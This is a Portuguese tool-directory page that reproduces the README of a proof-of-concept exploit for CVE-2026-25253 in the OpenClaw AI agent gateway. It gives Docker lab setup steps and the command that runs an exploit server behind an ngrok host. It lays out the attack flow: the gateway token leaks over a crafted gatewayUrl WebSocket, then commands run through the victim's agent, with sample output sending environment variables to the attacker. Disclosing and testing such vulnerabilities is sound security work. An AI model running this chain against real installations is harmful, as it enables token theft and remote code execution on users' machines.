Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-25253 — Exfiltração de Token de Autenticação do OpenClaw | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2026-25253
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

Exfiltração de Token de Autenticação do OpenClaw

Ver Repositório
26há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-25253 OpenClaw RCE de 1 Clique

★ CVE-2026-25253 OpenClaw PoC de Execução Remota de Código em 1 Clique ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Descrição

CVE-2026-25253 : Vulnerabilidade de Exfiltração de Token de Autenticação do OpenClaw

descrição: OpenClaw (também conhecido como clawdbot ou Moltbot) anterior a v2026.1.29 permite que atacantes exfiltrem um token de autenticação de gateway armazenado ao fornecer um valor de query-string gatewayUrl manipulado para a Interface de Controle, que estabelece automaticamente uma conexão WebSocket sem validação ou confirmação do usuário. Isso pode levar a acesso não autorizado ao gateway e execução remota de código em 1 clique.

Requisitos

  • Docker (Docker Desktop no Windows)
  • Python 3.x (lado do ataque)

Arquivos

  • Dockerfile — constrói o ambiente vulnerável do OpenClaw
  • templates/ — páginas web maliciosas usadas pelo exploit
  • config.txt — configuração do OpenClaw usada no ambiente da vítima
  • exploit.py — servidor do exploit
  • requirements.txt — dependências do PoC
  • Configuração do Ambiente

    1. Criar imagem Docker
    root@kitploit:~
    docker build -t openclaw-vuln .
    
    1. Executar ambiente (Windows)
    root@kitploit:~
    docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
    
    1. Criar túnel SSH
    root@kitploit:~
    ssh-keygen -R [127.0.0.1]:2222
    ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
    
    • Senha: openclawlab
    1. Acessar a Interface de Controle do OpenClaw Abra a seguinte URL no navegador
    root@kitploit:~
    http://127.0.0.1:18789/
    
    1. Insira o Token do Gateway d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
    2. Clique em Conectar
    3. Abra a aba Config
    4. cole o conteúdo de config.txt
    5. Substitua o campo de chave da API pela sua chave da API OpenAI
    6. Salve a configuração
    7. Confirme que o agente responde normalmente

    Prova de Conceito (PoC)

    1. Instalar dependências (lado do ataque)
    root@kitploit:~
    pip3 install -r requirements.txt
    
    1. Expor o servidor do exploit via HTTPS
    root@kitploit:~
    wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
    tar xzf ngrok-v3-stable-linux-amd64.tgz
    ./ngrok authtoken YOUR_TOKEN
    ./ngrok http 13337
    
    • Copie o hostname de encaminhamento gerado
    1. Executar servidor do exploit
    root@kitploit:~
    python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
    

    Exemplo:

    root@kitploit:~
    python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
    
    1. Disparar o ataque
    1. Abra a página maliciosa exposta pelo servidor do exploit
    2. Simule a interação da vítima com a página
    3. Dispare o fluxo do exploit a partir do navegador

    Fluxo do Ataque

    1. Uma URL maliciosa altera o gatewayUrl da Interface de Controle da vítima
    2. O navegador se conecta automaticamente ao endpoint WebSocket controlado pelo atacante
    3. O token de autenticação do gateway é vazado para o atacante
    4. A página maliciosa usa o token roubado para abrir uma nova conexão WebSocket com o gateway local do OpenClaw da vítima
    5. Uma requisição de execução de comando é enviada através do agente
    6. O resultado da execução é retornado ao servidor do atacante

    Resultado Esperado

    • O navegador da vítima é redirecionado para o fluxo WebSocket malicioso
    • O token de autenticação do gateway é capturado pelo atacante
    • O atacante pode enviar uma requisição de execução de comando através do OpenClaw
    • A saída do comando é retornada ao servidor do atacante

    Exemplo de Saída

    root@kitploit:~
    [*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
    [*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
    
    ==================================================
          [!] EXPLOIT RESULT CAPTURED [!]
    ==================================================
    HOSTNAME=openclaw-vuln
    PWD=/root
    HOME=/root
    ...
    ==================================================
    

    Notas

    • Este PoC tem como alvo o OpenClaw 2026.1.24-1
    • A cadeia de exploração depende do tratamento vulnerável do gatewayUrl na Interface de Controle
    • Para acesso remoto à vítima, a página maliciosa deve ser servida via HTTPS
    • O gateway local do OpenClaw é alcançado através do navegador da vítima como uma ponte

    EQST Insight

    Publicamos análises de CVEs e malware uma vez por mês. Se estiver interessado, siga os links abaixo para conferir nossas publicações.

    • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
    • EN : https://www.skshieldus.com/en/report?tab=eqst
    Baixar ferramenta